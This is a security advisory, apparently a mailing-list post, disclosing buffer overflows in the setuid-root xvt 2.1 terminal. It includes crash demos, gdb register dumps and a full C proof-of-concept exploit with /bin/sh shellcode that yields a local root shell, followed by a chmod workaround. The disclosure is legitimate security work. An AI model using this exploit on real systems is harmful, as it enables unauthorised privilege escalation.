Xvt 2.1 vulnerability

[BAILLEUX Christophe <cb () t-online fr>]

Package:                xvt
Version:                2.1
Problem type:           Local root vulnerability
Linux distribution:     only tested on Debian



----]   Introduction

xvt is an X terminal-emulator that is designed to be more or less
compatible with xterm while using much less swap space. It is mainly
intended for use at sites which use large numbers of X terminals but may
also be
useful on single workstations that are short of memory. The main way that
xvt achieves its small size is by avoiding the use of the X toolkit.

http://packages.debian.org/stable/x11/xvt.html


---]    Problems

After the security advisory about rxvt by Samuel Dralet
(samuel.dralet () mastersecurity fr), I discovered that xvt has some possible
buffer overrun conditions related to passing large arguments to xvt's -T
and -name command-line options.  Sice xvt is installed setuid root by
default, it was possible for a normal user to pass carefully-crafted
arguments to xvt such that xvt executed a root shell.

Debian Security Team has been informed.


----]   Demo


$ ls -l /usr/bin/X11/xvt
-rwsr-xr-x    1 root     root        50288 Mar 26  2000 /usr/bin/X11/xvt


$ xvt -V
xvt version 2.1



A)      xvt -name <buffer>


$ xvt -name `perl -e 'print "A"x234'`
Segmentation fault (core dumped)
$

tshaw:~$ gdb --core core
GNU gdb 5.0
<snip>
Core was generated by `xvt -name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb)



B)      xvt -T <buffer>


$ xvt -T `perl -e 'print "A"x262'`
Segmentation fault (core dumped)
$

$ gdb --core core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
<snip>
Core was generated by `xvt -T
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x804b043 in ?? ()
(gdb) where
#0  0x804b043 in ?? ()
#1  0x804c075 in ?? ()
#2  0x804b4f6 in ?? ()
#3  0x804a19c in ?? ()
(gdb) info reg
eax            0x8004100        134234368
ecx            0xffffffff       -1
edx            0x805524f        134566479
ebx            0x8055148        134566216
esp            0xbfffdea0       0xbfffdea0
ebp            0xbfffdeac       0xbfffdeac
esi            0x8004141        134234433
edi            0x8004141        134234433
eip            0x804b043        0x804b043
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
fctrl          0x0      0
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
(gdb)



----]    proof of exploited code


--- expl.c ---

/*

   /usr/bin/X11/xvt overflow proof of concept by cb () t-online fr.

   tshaw:~$ ./expl
   bash#

*/

#include <stdio.h>
#include <stdlib.h>

int main()

{

    char buf[234];
    int i;

    char code[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";


    for(i=0; i<76; i++)
        buf[i] = 0x41;

    *(long *)&buf[76]=0xbffffab0; /* ret addr */

    memset(buf + 80, 0x90, 234);
    memcpy(buf + 233 - strlen(code), code, strlen(code));

    buf[234] = '\0';

    execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);                           

}

--- expl.c ---



----]   Workaround


# chmod u-s /usr/bin/X11/xvt



----]   Greetings


Samuel Dralet   samuel.dralet () mastersecurity fr
Tufqi           tuf () mmania com


--   
Christophe Bailleux - Network & System Security Engineer                                                                
             
Club-Internet / T-Online France                                                                       
Voice:+33-(0)1-5545-4789 - mailto:cb () t-online fr